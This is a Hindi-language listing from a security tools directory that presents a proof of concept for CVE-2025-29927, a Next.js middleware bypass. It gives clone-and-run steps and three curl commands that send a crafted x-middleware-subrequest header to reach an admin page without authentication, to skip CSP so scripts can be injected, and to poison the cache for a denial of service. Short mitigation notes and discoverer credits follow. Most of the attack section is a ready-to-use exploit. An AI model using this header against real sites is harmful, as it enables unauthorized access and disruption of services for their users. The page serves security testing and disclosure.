Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 Proof of Concept | Kitploit
उपकरण/GitHubGitHub/eve-satoru/poc-cve-2025-29927
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWAF BypassWeb Security
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 Proof of Concept

रिपॉजिटरी देखें
311 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927: Next.js मिडलवेयर बाईपास PoC

अवलोकन

यह PoC CVE-2025-29927 को प्रदर्शित करता है, जो Next.js मिडलवेयर में एक कमजोरी है जो हमलावरों को x-middleware-subrequest हेडर का उपयोग करके प्रमाणीकरण, प्राधिकरण और CSP तंत्र को बायपास करने की अनुमति देता है।

प्रभावित संस्करण

Next.js संस्करण 11.1.4 से 15.1.7

सेटअप और इंस्टॉलेशन

1️⃣ PoC को क्लोन और इंस्टॉल करें

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

एप http://localhost:3000 पर शुरू होगा।

शोषण परिदृश्य

1️⃣ प्रमाणीकरण और प्राधिकरण को बायपास करें (cURL)

1- अनधिकृत पहुंच प्राप्त करने के लिए x-middleware-subrequest का उपयोग करें:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 अपेक्षित परिणाम: प्रतिक्रिया admin admin लौटाती है, भले ही प्रमाणीकरण को बायपास किया गया हो।

परिणाम स्क्रीनशॉट

2️⃣ XSS इंजेक्शन के लिए CSP बाईपास

यदि CSP मिडलवेयर के माध्यम से लागू किया गया है, तो इसे बायपास करें:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 अपेक्षित परिणाम: CSP को नजरअंदाज कर दिया जाता है, जिससे दुर्भावनापूर्ण स्क्रिप्ट निष्पादन की अनुमति मिलती है।

3️⃣ कैश-पॉइज़निंग DoS (CPDoS) हमला

गलत प्रतिक्रिया को मजबूर करके कैश पॉइज़निंग का शोषण करें:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 अपेक्षित परिणाम: पेज गलत सामग्री के साथ कैश हो जाता है, जो सामान्य उपयोगकर्ताओं को बाधित करता है।

शमन रणनीतियाँ

  • ✅ बाईपास को रोकने के लिए मिडलवेयर लॉजिक को मान्य करें .
  • ✅ पैच किया गया संस्करण जारी होने के बाद Next.js को अपग्रेड करें .

क्रेडिट्स

🔍 खोजकर्ता: Allam Rachid (zhero;) और Allam Yasser (inzo_)

टूल डाउनलोड करें